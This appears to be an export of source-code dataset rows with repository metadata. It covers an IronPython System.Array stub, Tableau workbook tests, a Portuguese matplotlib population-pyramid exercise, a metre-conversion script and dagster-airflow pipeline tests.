index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to get.
index3: A 64-bit integer that represents the third-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the three-dimensional System.Array.
GetValue(self: Array,index: int) -> object
Gets the value at the specified position in the one-dimensional System.Array.
The index is specified as a 32-bit integer.
index: A 32-bit integer that represents the position of the System.Array element to
get.
Returns: The value at the specified position in the one-dimensional System.Array.
GetValue(self: Array,*indices: Array[int]) -> object
Gets the value at the specified position in the multidimensional System.Array.
The indexes are specified as an array of 32-bit integers.
indices: A one-dimensional array of 32-bit integers that represent the indexes
specifying the position of the System.Array element to get.
Returns: The value at the specified position in the multidimensional System.Array.
GetValue(self: Array,index1: int,index2: int,index3: int) -> object
Gets the value at the specified position in the three-dimensional System.Array.
The indexes are specified as 32-bit integers.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to get.
index3: A 32-bit integer that represents the third-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the three-dimensional System.Array.
GetValue(self: Array,index1: int,index2: int) -> object
Gets the value at the specified position in the two-dimensional System.Array.
The indexes are specified as 32-bit integers.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the two-dimensional System.Array.
"""
pass
@staticmethod
def IndexOf(array,value,startIndex=None,count=None):
"""
IndexOf[T](array: Array[T],value: T) -> int
IndexOf[T](array: Array[T],value: T,startIndex: int) -> int
IndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
IndexOf(array: Array,value: object) -> int
Searches for the specified object and returns the index of the first occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
Returns: The index of the first occurrence of value within the entire array,if found;
otherwise,the lower bound of the array minus 1.
IndexOf(array: Array,value: object,startIndex: int) -> int
Searches for the specified object and returns the index of the first occurrence
within the range of elements in the one-dimensional System.Array that extends
from the specified index to the last element.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the search. 0 (zero) is valid in an empty array.
Returns: The index of the first occurrence of value within the range of elements in
array that extends from startIndex to the last element,if found; otherwise,
the lower bound of the array minus 1.
IndexOf(array: Array,value: object,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the first occurrence
within the range of elements in the one-dimensional System.Array that starts at
the specified index and contains the specified number of elements.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the search. 0 (zero) is valid in an empty array.
count: The number of elements in the section to search.
Returns: The index of the first occurrence of value within the range of elements in
array that starts at startIndex and contains the number of elements specified
in count,if found; otherwise,the lower bound of the array minus 1.
"""
pass
def Initialize(self):
"""
Initialize(self: Array)
Initializes every element of the value-type System.Array by calling the default
constructor of the value type.
"""
pass
@staticmethod
def LastIndexOf(array,value,startIndex=None,count=None):
"""
LastIndexOf[T](array: Array[T],value: T) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
LastIndexOf(array: Array,value: object) -> int
Searches for the specified object and returns the index of the last occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
Returns: The index of the last occurrence of value within the entire array,if found;
otherwise,the lower bound of the array minus 1.
LastIndexOf(array: Array,value: object,startIndex: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the range of elements in the one-dimensional System.Array that extends
from the first element to the specified index.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the backward search.
Returns: The index of the last occurrence of value within the range of elements in array
that extends from the first element to startIndex,if found; otherwise,the
lower bound of the array minus 1.
LastIndexOf(array: Array,value: object,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the range of elements in the one-dimensional System.Array that contains
the specified number of elements and ends at the specified index.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the backward search.
count: The number of elements in the section to search.
Returns: The index of the last occurrence of value within the range of elements in array
that contains the number of elements specified in count and ends at startIndex,
if found; otherwise,the lower bound of the array minus 1.
"""
pass
@staticmethod
def Resize(array,newSize):
""" Resize[T](array: Array[T],newSize: int) -> Array[T] """
pass
@staticmethod
def Reverse(array,index=None,length=None):
"""
Reverse(array: Array,index: int,length: int)
Reverses the sequence of the elements in a range of elements in the
one-dimensional System.Array.
array: The one-dimensional System.Array to reverse.
index: The starting index of the section to reverse.
length: The number of elements in the section to reverse.
Reverse(array: Array)
Reverses the sequence of the elements in the entire one-dimensional
System.Array.
array: The one-dimensional System.Array to reverse.
"""
pass
def SetValue(self,value,*__args):
"""
SetValue(self: Array,value: object,index1: Int64,index2: Int64)
Sets a value to the element at the specified position in the two-dimensional
System.Array. The indexes are specified as 64-bit integers.
value: The new value for the specified element.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index: Int64)
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 64-bit integer.
value: The new value for the specified element.
index: A 64-bit integer that represents the position of the System.Array element to
set.
SetValue(self: Array,value: object,*indices: Array[Int64])
Sets a value to the element at the specified position in the multidimensional
System.Array. The indexes are specified as an array of 64-bit integers.
value: The new value for the specified element.
indices: A one-dimensional array of 64-bit integers that represent the indexes
specifying the position of the element to set.
SetValue(self: Array,value: object,index1: Int64,index2: Int64,index3: Int64)
Sets a value to the element at the specified position in the three-dimensional
System.Array. The indexes are specified as 64-bit integers.
value: The new value for the specified element.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
index3: A 64-bit integer that represents the third-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index1: int,index2: int)
Sets a value to the element at the specified position in the two-dimensional
System.Array. The indexes are specified as 32-bit integers.
value: The new value for the specified element.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index: int)
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 32-bit integer.
value: The new value for the specified element.
index: A 32-bit integer that represents the position of the System.Array element to
set.
SetValue(self: Array,value: object,*indices: Array[int])
Sets a value to the element at the specified position in the multidimensional
System.Array. The indexes are specified as an array of 32-bit integers.
value: The new value for the specified element.
indices: A one-dimensional array of 32-bit integers that represent the indexes
specifying the position of the element to set.
SetValue(self: Array,value: object,index1: int,index2: int,index3: int)
Sets a value to the element at the specified position in the three-dimensional
System.Array. The indexes are specified as 32-bit integers.
value: The new value for the specified element.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to set.
index3: A 32-bit integer that represents the third-dimension index of the System.Array
element to set.
"""
pass
@staticmethod
def Sort(*__args):
"""
Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],index: int,length: int)
Sort[T](array: Array[T],comparer: IComparer[T])
Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue])
Sort[T](array: Array[T],index: int,length: int)
Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],index: int,length: int,comparer: IComparer[TKey])
Sort[T](array: Array[T],comparison: Comparison[T])
Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],comparer: IComparer[TKey])
Sort[T](array: Array[T],index: int,length: int,comparer: IComparer[T])
Sort[T](array: Array[T])
Sort(array: Array,index: int,length: int)
Sorts the elements in a range of elements in a one-dimensional System.Array
using the System.IComparable implementation of each element of the
System.Array.
array: The one-dimensional System.Array to sort.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
Sort(keys: Array,items: Array,index: int,length: int)
Sorts a range of elements in a pair of one-dimensional System.Array objects
(one contains the keys and the other contains the corresponding items) based on
the keys in the first System.Array using the System.IComparable implementation
of each key.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
Sort(array: Array)
Sorts the elements in an entire one-dimensional System.Array using the
System.IComparable implementation of each element of the System.Array.
array: The one-dimensional System.Array to sort.
Sort(keys: Array,items: Array)
Sorts a pair of one-dimensional System.Array objects (one contains the keys and
the other contains the corresponding items) based on the keys in the first
System.Array using the System.IComparable implementation of each key.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
Sort(array: Array,index: int,length: int,comparer: IComparer)
Sorts the elements in a range of elements in a one-dimensional System.Array
using the specified System.Collections.IComparer.
array: The one-dimensional System.Array to sort.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(keys: Array,items: Array,index: int,length: int,comparer: IComparer)
Sorts a range of elements in a pair of one-dimensional System.Array objects
(one contains the keys and the other contains the corresponding items) based on
the keys in the first System.Array using the specified
System.Collections.IComparer.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(array: Array,comparer: IComparer)
Sorts the elements in a one-dimensional System.Array using the specified
System.Collections.IComparer.
array: The one-dimensional System.Array to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(keys: Array,items: Array,comparer: IComparer)
Sorts a pair of one-dimensional System.Array objects (one contains the keys and
the other contains the corresponding items) based on the keys in the first
System.Array using the specified System.Collections.IComparer.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
"""
pass
@staticmethod
def TrueForAll(array,match):
""" TrueForAll[T](array: Array[T],match: Predicate[T]) -> bool """
pass
def __add__(self,*args):
""" x.__add__(y) <==> x+y """
pass
def __contains__(self,*args):
"""
__contains__(self: IList,value: object) -> bool
Determines whether the System.Collections.IList contains a specific value.
value: The object to locate in the System.Collections.IList.
Returns: true if the System.Object is found in the System.Collections.IList; otherwise,
false.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y] """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __hash__(self,*args):
""" x.__hash__() <==> hash(x) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __len__(self,*args):
""" x.__len__() <==> len(x) """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __mul__(self,*args):
""" x.__mul__(y) <==> x*y """
pass
@staticmethod
def __new__(self,*args): #cannot find CLR constructor
"""
__new__(pythonType: type,items: object) -> object
__new__(pythonType: type,items: ICollection) -> object
"""
pass
def __ne__(self,*args):
pass
def __radd__(self,*args):
""" __radd__(data1: Array,data2: Array) -> Array """
pass
def __reduce_ex__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: Array) -> str """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]=x.__setitem__(i,y) <==> x[i]=x.__setitem__(i,y) <==> x[i]= """
pass
IsFixedSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Array has a fixed size.
Get: IsFixedSize(self: Array) -> bool
"""
IsReadOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the System.Array is read-only.
Get: IsReadOnly(self: Array) -> bool
"""
IsSynchronized=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether access to the System.Array is synchronized (thread safe).
Get: IsSynchronized(self: Array) -> bool
"""
Length=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a 32-bit integer that represents the total number of elements in all the dimensions of the System.Array.
Get: Length(self: Array) -> int
"""
LongLength=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a 64-bit integer that represents the total number of elements in all the dimensions of the System.Array.
Get: LongLength(self: Array) -> Int64
"""
Rank=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the rank (number of dimensions) of the System.Array.
Get: Rank(self: Array) -> int
"""
SyncRoot=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets an object that can be used to synchronize access to the System.Array.
Get: SyncRoot(self: Array) -> object
"""
| 42.993548
| 617
| 0.702131
| true
| true
|
f70b78fe961ac969ab87dde5b0b394f97850c561
| 1,589
|
py
|
Python
|
test/test_worksheet.py
|
adrianturcato/document-api-python
|
a9b69fa83210172c9302b57f5f5cd4dfa7e9d1c5
|
[
"MIT"
] | null | null | null |
test/test_worksheet.py
|
adrianturcato/document-api-python
|
a9b69fa83210172c9302b57f5f5cd4dfa7e9d1c5
|
[
"MIT"
] | null | null | null |
test/test_worksheet.py
|
adrianturcato/document-api-python
|
a9b69fa83210172c9302b57f5f5cd4dfa7e9d1c5
|
[
"MIT"
] | null | null | null |
import os.path
import unittest
import hashlib
from tableaudocumentapi import Workbook
TEST_ASSET_DIR = os.path.join(
os.path.dirname(__file__),
'assets'
)
TEST_TWB_FILE = os.path.join(
TEST_ASSET_DIR,
'group_test.twb'
)
TEST_TWB_FILE2 = os.path.join(
TEST_ASSET_DIR,
'add_user_filter_test.twb'
)
ACCESS_PERMISSIONS = os.path.join(
TEST_ASSET_DIR,
'access_permissions.csv'
)
class WorksheetTWB(unittest.TestCase):
def test_worksheet(self):
self.wb = Workbook(TEST_TWB_FILE)
self.worksheets = self.wb.worksheets
self.assertEqual('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.worksheets[0].datasources[0]['name'])
self.assertTrue(self.worksheets[0].slices.has_user_filter())
def test_adding_column_to_slices(self):
print("test_adding_column_to_slices")
with open(ACCESS_PERMISSIONS) as f:
self.csv2 = f.read()
self.wb2 = Workbook(TEST_TWB_FILE2)
self.assertEqual(2,len(self.wb2.worksheets))
self.assertEqual('Sheet 1', self.wb2.worksheets[0].name)
self.assertEqual('[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[none:Advertiser:nk]', self.wb2.worksheets[0].slices.columns[0])
self.assertFalse(self.wb2.worksheets[0].slices.has_user_filter())
self.wb2.ingest_access_permissions('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.csv2)
self.assertEqual("[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[User Filter 1]",self.wb2.worksheets[0].slices.columns[0])
self.assertTrue("has", self.wb2.worksheets[0].slices.has_user_filter())
| 30.557692
| 131
| 0.71995
|
import os.path
import unittest
import hashlib
from tableaudocumentapi import Workbook
TEST_ASSET_DIR = os.path.join(
os.path.dirname(__file__),
'assets'
)
TEST_TWB_FILE = os.path.join(
TEST_ASSET_DIR,
'group_test.twb'
)
TEST_TWB_FILE2 = os.path.join(
TEST_ASSET_DIR,
'add_user_filter_test.twb'
)
ACCESS_PERMISSIONS = os.path.join(
TEST_ASSET_DIR,
'access_permissions.csv'
)
class WorksheetTWB(unittest.TestCase):
def test_worksheet(self):
self.wb = Workbook(TEST_TWB_FILE)
self.worksheets = self.wb.worksheets
self.assertEqual('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.worksheets[0].datasources[0]['name'])
self.assertTrue(self.worksheets[0].slices.has_user_filter())
def test_adding_column_to_slices(self):
print("test_adding_column_to_slices")
with open(ACCESS_PERMISSIONS) as f:
self.csv2 = f.read()
self.wb2 = Workbook(TEST_TWB_FILE2)
self.assertEqual(2,len(self.wb2.worksheets))
self.assertEqual('Sheet 1', self.wb2.worksheets[0].name)
self.assertEqual('[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[none:Advertiser:nk]', self.wb2.worksheets[0].slices.columns[0])
self.assertFalse(self.wb2.worksheets[0].slices.has_user_filter())
self.wb2.ingest_access_permissions('federated.1cfcaj20zwyr8f1c3we6w0yu3sh4',self.csv2)
self.assertEqual("[federated.1cfcaj20zwyr8f1c3we6w0yu3sh4].[User Filter 1]",self.wb2.worksheets[0].slices.columns[0])
self.assertTrue("has", self.wb2.worksheets[0].slices.has_user_filter())
| true
| true
|
f70b7a68b18379e63dccf55607bdb8100c19a3f3
| 2,639
|
py
|
Python
|
exercicio-4.py
|
AnielliRosane/lista-ser347
|
61a8ac8f675dc0ec05f45408c54e9d3a0e515ff4
|
[
"MIT"
] | null | null | null |
exercicio-4.py
|
AnielliRosane/lista-ser347
|
61a8ac8f675dc0ec05f45408c54e9d3a0e515ff4
|
[
"MIT"
] | null | null | null |
exercicio-4.py
|
AnielliRosane/lista-ser347
|
61a8ac8f675dc0ec05f45408c54e9d3a0e515ff4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Exercise list 06
# Exercise 4
# importing the libraries
import matplotlib.pyplot as plt
import numpy as np
# table data for the male and female population by age group (IBGE)
idade = np.array(
["0 a 4 anos", "5 a 9 anos", "10 a 14 anos", "15 a 19 anos", "20 a 24 anos", "25 a 29 anos",
"30 a 34 anos", "35 a 39 anos", "40 a 44 anos", "45 a 49 anos", "50 a 54 anos", "55 a 59 anos",
"60 a 64 anos", "65 a 69 anos", "70 a 74 anos", "75 a 79 anos", "80 a 84 anos", "85 a 89 anos",
"90 a 94 anos", "95 a 99 anos", "100 anos e mais"])
feminino = np.array([6779171, 7345231, 8441348, 8432004, 8614963, 8643419, 8026854, 7121915, 6688796, 6141338, 5305407,
4373877, 3468085, 2616745, 2074264, 1472930, 998349, 508724, 211594, 66806, 16989])
masculino = np.array([7016987, 7624144, 8725413, 8558868, 8630229, 8460995, 7717658, 6766664, 6320568, 5692014, 4834995,
3902344, 3041035, 2224065, 1667372, 1090517, 668623, 310759, 114964, 31529, 7247])
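# one count per age group; barh() below draws the two series as mirrored
# horizontal bars (male side with an inverted x-axis, female side normal)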
pop = list(range(len(idade)))
# Chart configuration
plt.figure(figsize=(10, 8))
plt.suptitle('Distribuição da População por sexo segundo os grupos de idade – Brasil – 2010', fontsize=18)
plt.rc('axes.spines', **{'bottom': True, 'left': False, 'right': False, 'top': False})  # removes the figure spines
# Male subplot
plt.subplot(221)
plt.barh(idade, masculino, align='center', color='blue', linewidth=0.5, label='Masculino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["", "", "4000000", "", ""])  # one label per tick position
plt.legend(loc='upper left')  # legend
plt.subplots_adjust(left=0.15, wspace=0.4)  # space between the subplots
plt.gca().invert_xaxis()  # mirror the male side of the pyramid
plt.yticks([])  # hide the y-axis tick labels
# reference gridlines
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.20)
# Female subplot
plt.subplot(222)
plt.barh(idade, feminino, align='center', color='orange', linewidth=0.5, label='Feminino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["0", "", "4000000", "", ""])
plt.legend(loc='upper right')  # legend
# reference gridlines
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.30)
plt.show()
| 35.662162
| 120
| 0.678287
|
import matplotlib.pyplot as plt
import numpy as np
idade = np.array(
["0 a 4 anos", "5 a 9 anos", "10 a 14 anos", "15 a 19 anos", "20 a 24 anos", "25 a 29 anos",
"30 a 34 anos", "35 a 39 anos", "40 a 44 anos", "45 a 49 anos", "50 a 54 anos", "55 a 59 anos",
"60 a 64 anos", "65 a 69 anos", "70 a 74 anos", "75 a 79 anos", "80 a 84 anos", "85 a 89 anos",
"90 a 94 anos", "95 a 99 anos", "100 anos e mais"])
feminino = np.array([6779171, 7345231, 8441348, 8432004, 8614963, 8643419, 8026854, 7121915, 6688796, 6141338, 5305407,
4373877, 3468085, 2616745, 2074264, 1472930, 998349, 508724, 211594, 66806, 16989])
masculino = np.array([7016987, 7624144, 8725413, 8558868, 8630229, 8460995, 7717658, 6766664, 6320568, 5692014, 4834995,
3902344, 3041035, 2224065, 1667372, 1090517, 668623, 310759, 114964, 31529, 7247])
pop = list(range(len(idade)))
plt.figure(figsize=(10, 8))
plt.suptitle('Distribuição da População por sexo segundo os grupos de idade – Brasil – 2010', fontsize=18)
plt.rc('axes.spines', **{'bottom': True, 'left': False, 'right': False, 'top': False})
plt.subplot(221)
plt.barh(idade, masculino, align='center', color='blue', linewidth=0.5, label='Masculino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["", "", "4000000", "", ""])
plt.legend(loc='upper left')
plt.subplots_adjust(left=0.15, wspace=0.4)
plt.gca().invert_xaxis()
plt.yticks([])
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.20)
plt.subplot(222)
plt.barh(idade, feminino, align='center', color='orange', linewidth=0.5, label='Feminino')
plt.xticks([0, 2000000, 4000000, 6000000, 8000000], ["0", "", "4000000", "", ""])
plt.legend(loc='upper right')
plt.axvline(8000000, color='grey', alpha=0.15)
plt.axvline(6000000, color='grey', alpha=0.15)
plt.axvline(4000000, color='grey', alpha=0.15)
plt.axvline(2000000, color='grey', alpha=0.15)
plt.axvline(0, color='black', alpha=0.30)
plt.show()
| true
| true
|
f70b7a9deb9229cf2e91e60271efe0589b08ae67
| 295
|
py
|
Python
|
projetos em python/exercicio8.py
|
gustavo621/projetos-em-python
|
4797ae7226a2c4a628dd0cd746e7bc3050b72f04
|
[
"MIT"
] | null | null | null |
projetos em python/exercicio8.py
|
gustavo621/projetos-em-python
|
4797ae7226a2c4a628dd0cd746e7bc3050b72f04
|
[
"MIT"
] | null | null | null |
projetos em python/exercicio8.py
|
gustavo621/projetos-em-python
|
4797ae7226a2c4a628dd0cd746e7bc3050b72f04
|
[
"MIT"
] | null | null | null |
metros = int(input("uma distância em metro: "))
print("A medida de {}m corresponde a".format())
print("{}km".format(metros/1000))
print("{}hm".format(metros/100))
print("{}dam".format(metros/10))
print("{}dm".format(metros*10))
print("{}cm".format(metros*100))
print("{}mm".format(metros*1000))
| 32.777778
| 47
| 0.674576
|
metros = int(input("uma distância em metro: "))
print("A medida de {}m corresponde a".format())
print("{}km".format(metros/1000))
print("{}hm".format(metros/100))
print("{}dam".format(metros/10))
print("{}dm".format(metros*10))
print("{}cm".format(metros*100))
print("{}mm".format(metros*1000))
| true
| true
|
f70b7b226b60ffaa1edf1653d8ef3f8943d4f01f
| 9,614
|
py
|
Python
|
python_modules/dagster-airflow/dagster_airflow_tests/test_factory.py
|
rparrapy/dagster
|
453ebedb326eae48b5f8fa2a4a3811d94629dc6e
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster-airflow/dagster_airflow_tests/test_factory.py
|
rparrapy/dagster
|
453ebedb326eae48b5f8fa2a4a3811d94629dc6e
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster-airflow/dagster_airflow_tests/test_factory.py
|
rparrapy/dagster
|
453ebedb326eae48b5f8fa2a4a3811d94629dc6e
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
import os
import uuid
from airflow.exceptions import AirflowSkipException
from dagster_airflow.factory import AIRFLOW_MAX_DAG_NAME_LEN, _rename_for_airflow
from dagster_airflow.test_fixtures import ( # pylint: disable=unused-import
dagster_airflow_docker_operator_pipeline,
dagster_airflow_k8s_operator_pipeline,
dagster_airflow_python_operator_pipeline,
)
from dagster_airflow_tests.conftest import IMAGE
from dagster_airflow_tests.marks import nettest
from dagster import ExecutionTargetHandle
from dagster.core.events.log import DagsterEventRecord
from dagster.utils import script_relative_path
AIRFLOW_DEMO_EVENTS = {
('ENGINE_EVENT', None),
('STEP_START', 'multiply_the_word.compute'),
('STEP_INPUT', 'multiply_the_word.compute'),
('STEP_OUTPUT', 'multiply_the_word.compute'),
('OBJECT_STORE_OPERATION', 'multiply_the_word.compute'),
('STEP_SUCCESS', 'multiply_the_word.compute'),
('STEP_START', 'count_letters.compute'),
('OBJECT_STORE_OPERATION', 'count_letters.compute'),
('STEP_INPUT', 'count_letters.compute'),
('STEP_OUTPUT', 'count_letters.compute'),
('STEP_SUCCESS', 'count_letters.compute'),
}
ENVIRONMENTS_PATH = script_relative_path(
os.path.join(
'..',
'..',
'..',
'.buildkite',
'images',
'docker',
'test_project',
'test_pipelines',
'environments',
)
)
def validate_pipeline_execution(pipeline_exc_result):
seen_events = set()
for result in pipeline_exc_result.values():
for event in result:
if isinstance(event, DagsterEventRecord):
seen_events.add((event.dagster_event.event_type_value, event.step_key))
else:
seen_events.add((event.event_type_value, event.step_key))
assert seen_events == AIRFLOW_DEMO_EVENTS
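# The TestExecuteDag* classes below are pure data holders (pipeline_name, handle,
# environment_yaml, run_id, plus image/op_kwargs where needed); the imported
# dagster_airflow_*_operator_pipeline fixtures read these attributes off the
# requesting test class to build and execute the corresponding Airflow DAG.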
class TestExecuteDagPythonFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonFilesystemStorage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagPythonGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
# pylint: disable=redefined-outer-name
def test_execute_dag(self, dagster_airflow_python_operator_pipeline):
validate_pipeline_execution(dagster_airflow_python_operator_pipeline)
class TestExecuteDagContainerizedFilesystemStorageNoExplicitBaseDir(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_filesystem_no_explicit_base_dir.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedS3Storage(object):
pipeline_name = 'demo_pipeline'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_s3.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
@nettest
class TestExecuteDagContainerizedGCSStorage(object):
pipeline_name = 'demo_pipeline_gcs'
handle = ExecutionTargetHandle.for_pipeline_module('test_pipelines', pipeline_name)
environment_yaml = [
os.path.join(ENVIRONMENTS_PATH, 'env.yaml'),
os.path.join(ENVIRONMENTS_PATH, 'env_gcs.yaml'),
]
run_id = str(uuid.uuid4())
image = IMAGE
# pylint: disable=redefined-outer-name
def test_execute_dag_containerized(self, dagster_airflow_docker_operator_pipeline):
validate_pipeline_execution(dagster_airflow_docker_operator_pipeline)
